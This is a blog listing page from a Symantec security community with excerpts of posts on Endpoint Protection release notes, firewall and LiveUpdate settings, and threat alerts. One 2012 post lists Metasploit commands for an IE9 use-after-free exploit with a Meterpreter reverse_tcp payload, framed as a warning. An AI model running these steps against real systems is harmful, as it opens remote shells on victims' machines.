Video Screencast Help
Security Community Blog
Showing posts tagged with 11.x
Showing posts in English
SebastianZ | 26 Feb 2013 | 0 comments

Release Notes for SEP 11.x reaching back to SEP 11 RU5 - PDF documents for download.

The fix notes are based on the Article: http://www.symantec.com/docs/TECH103087 - here split into .pdf documents separate for each SEP Revision. Easy to find, easy to browse.

Additionaly some of the Best Practices, Installation-Client-Administration Guides for 11.x - as found on the Installation media from SEP 11 RU6 till RU7 MP3 - documents are in version 11.00.06.00.00.

I will try to add some more documentation in the future as well keep it up to date with next SEP 11.x Releases.

Sumit G | 17 Feb 2013 | 0 comments

 

Hi Friends,

In this blog i have added some Articles which can help to guide about firewall policy.

Symantec Endpoint Protection Manager - Firewall - Policies explained

 

Article:TECH104433

 | 

Created: 2008-01-20

 | 

Updated: 2010-11-30

 | 

Article URL http://www.symantec.com/docs/TECH104433

How a firewall works

 

Article:HOWTO55054

 | 

Created: 2011-06-29

 | 

Updated: 2011-12-17

 | 

...

Vikram Kumar-SAV to SEP | 04 Feb 2013 | 0 comments

 

Symantec keeps tab on the changing Threat Landscape and incorporates relevant security on its products.Same is the story with SAV to SEP to now SEP 12..

When we had SAV in the market what our customer needed was just a Antivirus to protect their system from downtime..here antivirus was looked more as a Availability facilitator than a core security product..till early 2000.

Even though we had SCS (firewall and IPS) seclected people used the other features.

Starting from 2006-2007 that was a high rise in malware being created and vulnerabilities being exploited..slowly the trend changed and it all came down to money making malwares..

FakeAntivirus, Downadup, Various Blackmailing Trojans etc..here the audience was not high profile..and SEP 11 very well detect and blocks and does whatever it can..Slowly people started using IPS, ADC and found much more can be done with SEP and they are doing it..

However in last few years there has been...

SebastianZ | 02 Feb 2013 | 0 comments

A small compilation from the Symantec Portfolio including Data Sheets of several Symantec Security Products.

 

- Symantec™ Endpoint Protection 12.1.2 (10/12)
http://www.symantec.com/endpoint-protection/data-s...

- Symantec Endpoint Protection Small Business Edition 2013 (11/12)
http://www.symantec.com/endpoint-protection-small-...

- Symantec™ Protection Suite Enterprise Edition - Comprehensive, powerful endpoint, messaging, and Web protection, for less
money (06/11)
...

rs_cert | 24 Dec 2012 | 0 comments

Hi

Below are the Step which can help to Enable the Live Update Tab on that client which are managed by Server but not in office domain/network

 

Double click on Symantec Client shield from Taskbar.

Go to HELP AND SUPPORT -> TROUBLESHOOT

From TROUBLESHOOT Tab Export the Policy from Policy Profile

Save it with name of Policy.xml in your Local System

Edit the Policy.xml in Notepad

Find the below Content and make the appropriate changes mention below.

AllowManualLiveUpdate, AllowPatchByLiveUpdate

 Set the Value as "1"

(I.E AllowManualLiveUpdate="1" , AllowPatchByLiveUpdate="1")

Than save the file in XML format and import the same.

Import Step

Go to HELP AND SUPPORT ->...

Brandon Noble | 30 Nov 2012 | 15 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
ABN | 22 Aug 2012 | 3 comments

Hello Gents,

We normally do come across the scenario of Live update affecting our ususal work of, being a Symantec administrator. Scenarios like

  1. Clients do not have the ability to launch liveupate even though policy is been set to do so. Or vice versa.
  1. Low disk space causing SEP not to update on critical serves. Definition is stored only on the OS drive were space is a major concern.

 

By default the SEP definitions will be stored in the Operating System drive even if we install it in a different partition.

With the following process we can configure the Liveupdate settings, the number of revision that is kept on the SEP (client) and also change the location on where it is stored.

 

I )   To enable Liveupdate on the SEP.

    From SEPM:

    http...